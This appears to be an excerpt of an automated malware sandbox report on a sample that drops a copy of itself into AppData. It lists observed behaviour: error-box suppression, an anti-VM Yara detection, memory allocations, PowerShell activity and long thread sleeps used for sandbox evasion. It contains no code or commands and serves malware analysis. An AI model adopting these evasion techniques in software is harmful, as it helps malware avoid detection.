Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: Ti5nuRV7y4.exe PID: 792, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: aoTiGLRa.exe PID: 7560, type: MEMORYSTR

Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Memory allocated: 1530000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Memory allocated: 2FE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Memory allocated: 2D50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Memory allocated: 9020000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Memory allocated: 78D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Memory allocated: A020000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Memory allocated: B020000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Memory allocated: 1560000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Memory allocated: 31E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Memory allocated: 3020000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Memory allocated: 1440000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Memory allocated: 2F70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Memory allocated: 2DE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Memory allocated: 8B20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Memory allocated: 9B20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Memory allocated: 9D10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Memory allocated: AD10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Memory allocated: 32A0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Memory allocated: 3340000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Memory allocated: 5340000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Thread delayed: delay time: 599344	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Thread delayed: delay time: 599234	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Thread delayed: delay time: 599125	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Thread delayed: delay time: 599016	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Thread delayed: delay time: 598906	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Thread delayed: delay time: 598797	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Thread delayed: delay time: 598687	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Thread delayed: delay time: 598577	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Thread delayed: delay time: 598465	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Thread delayed: delay time: 598359	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Thread delayed: delay time: 598250	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Thread delayed: delay time: 598134	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Thread delayed: delay time: 598016	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Thread delayed: delay time: 597906	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Thread delayed: delay time: 597795	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Thread delayed: delay time: 597687	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Thread delayed: delay time: 597578	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Thread delayed: delay time: 597466	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Thread delayed: delay time: 597359	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Thread delayed: delay time: 597250	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Thread delayed: delay time: 597140	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Thread delayed: delay time: 597031	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Thread delayed: delay time: 596921	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Thread delayed: delay time: 596812	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Thread delayed: delay time: 596702	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Thread delayed: delay time: 596593	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Thread delayed: delay time: 596484	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Thread delayed: delay time: 596375	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Thread delayed: delay time: 596266	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Thread delayed: delay time: 596156	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Thread delayed: delay time: 596047	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Thread delayed: delay time: 595937	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Thread delayed: delay time: 595828	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Thread delayed: delay time: 595718	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Thread delayed: delay time: 595609	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Thread delayed: delay time: 595500	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Thread delayed: delay time: 595390	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Thread delayed: delay time: 595281	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Thread delayed: delay time: 595172	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Thread delayed: delay time: 595062	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Thread delayed: delay time: 594953	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Thread delayed: delay time: 594844	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Thread delayed: delay time: 594733	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Thread delayed: delay time: 594625	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Thread delayed: delay time: 599891
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Thread delayed: delay time: 599766
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Thread delayed: delay time: 599641
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Thread delayed: delay time: 599531
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Thread delayed: delay time: 599422
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Thread delayed: delay time: 599285
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Thread delayed: delay time: 599156
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Thread delayed: delay time: 599047
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Thread delayed: delay time: 598937
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Thread delayed: delay time: 598828
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Thread delayed: delay time: 598718
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Thread delayed: delay time: 598609
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Thread delayed: delay time: 598499
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Thread delayed: delay time: 598390
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Thread delayed: delay time: 598281
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Thread delayed: delay time: 598172
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Thread delayed: delay time: 598062
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Thread delayed: delay time: 597953
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Thread delayed: delay time: 597843
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Thread delayed: delay time: 597730
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Thread delayed: delay time: 597609
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Thread delayed: delay time: 597500
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Thread delayed: delay time: 597390
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Thread delayed: delay time: 597281
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Thread delayed: delay time: 597172
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Thread delayed: delay time: 597062
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Thread delayed: delay time: 596948
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Thread delayed: delay time: 596828
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Thread delayed: delay time: 596687
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Thread delayed: delay time: 596578
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Thread delayed: delay time: 596469
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Thread delayed: delay time: 596331
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Thread delayed: delay time: 596203
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Thread delayed: delay time: 596092
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Thread delayed: delay time: 595984
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Thread delayed: delay time: 595872
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Thread delayed: delay time: 595766
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Thread delayed: delay time: 595654
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Thread delayed: delay time: 595547
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Thread delayed: delay time: 595437
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Thread delayed: delay time: 595328
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Thread delayed: delay time: 595219
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Thread delayed: delay time: 595094
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Thread delayed: delay time: 594984
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Thread delayed: delay time: 594874
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Thread delayed: delay time: 594766
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Thread delayed: delay time: 594656
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Thread delayed: delay time: 594547
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Thread delayed: delay time: 594437

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5045	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6449	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 616	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Window / User API: threadDelayed 2596	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Window / User API: threadDelayed 7261	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Window / User API: threadDelayed 7663
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Window / User API: threadDelayed 2188

Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe TID: 6532	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7220	Thread sleep count: 5045 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7392	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7220	Thread sleep count: 230 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7260	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7416	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7360	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe TID: 7640	Thread sleep count: 36 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe TID: 7640	Thread sleep time: -33204139332677172s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe TID: 7640	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe TID: 7644	Thread sleep count: 2596 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe TID: 7640	Thread sleep time: -599890s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe TID: 7644	Thread sleep count: 7261 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe TID: 7640	Thread sleep time: -599781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe TID: 7640	Thread sleep time: -599672s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe TID: 7640	Thread sleep time: -599562s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe TID: 7640	Thread sleep time: -599453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe TID: 7640	Thread sleep time: -599344s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe TID: 7640	Thread sleep time: -599234s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe TID: 7640	Thread sleep time: -599125s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe TID: 7640	Thread sleep time: -599016s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe TID: 7640	Thread sleep time: -598906s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe TID: 7640	Thread sleep time: -598797s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe TID: 7640	Thread sleep time: -598687s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe TID: 7640	Thread sleep time: -598577s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe TID: 7640	Thread sleep time: -598465s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe TID: 7640	Thread sleep time: -598359s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe TID: 7640	Thread sleep time: -598250s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe TID: 7640	Thread sleep time: -598134s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe TID: 7640	Thread sleep time: -598016s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe TID: 7640	Thread sleep time: -597906s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe TID: 7640	Thread sleep time: -597795s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe TID: 7640	Thread sleep time: -597687s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe TID: 7640	Thread sleep time: -597578s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe TID: 7640	Thread sleep time: -597466s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe TID: 7640	Thread sleep time: -597359s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe TID: 7640	Thread sleep time: -597250s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe TID: 7640	Thread sleep time: -597140s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe TID: 7640	Thread sleep time: -597031s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe TID: 7640	Thread sleep time: -596921s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe TID: 7640	Thread sleep time: -596812s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe TID: 7640	Thread sleep time: -596702s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe TID: 7640	Thread sleep time: -596593s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe TID: 7640	Thread sleep time: -596484s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe TID: 7640	Thread sleep time: -596375s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe TID: 7640	Thread sleep time: -596266s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe TID: 7640	Thread sleep time: -596156s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe TID: 7640	Thread sleep time: -596047s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe TID: 7640	Thread sleep time: -595937s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe TID: 7640	Thread sleep time: -595828s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe TID: 7640	Thread sleep time: -595718s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe TID: 7640	Thread sleep time: -595609s >= -30000s	Jump to behavior
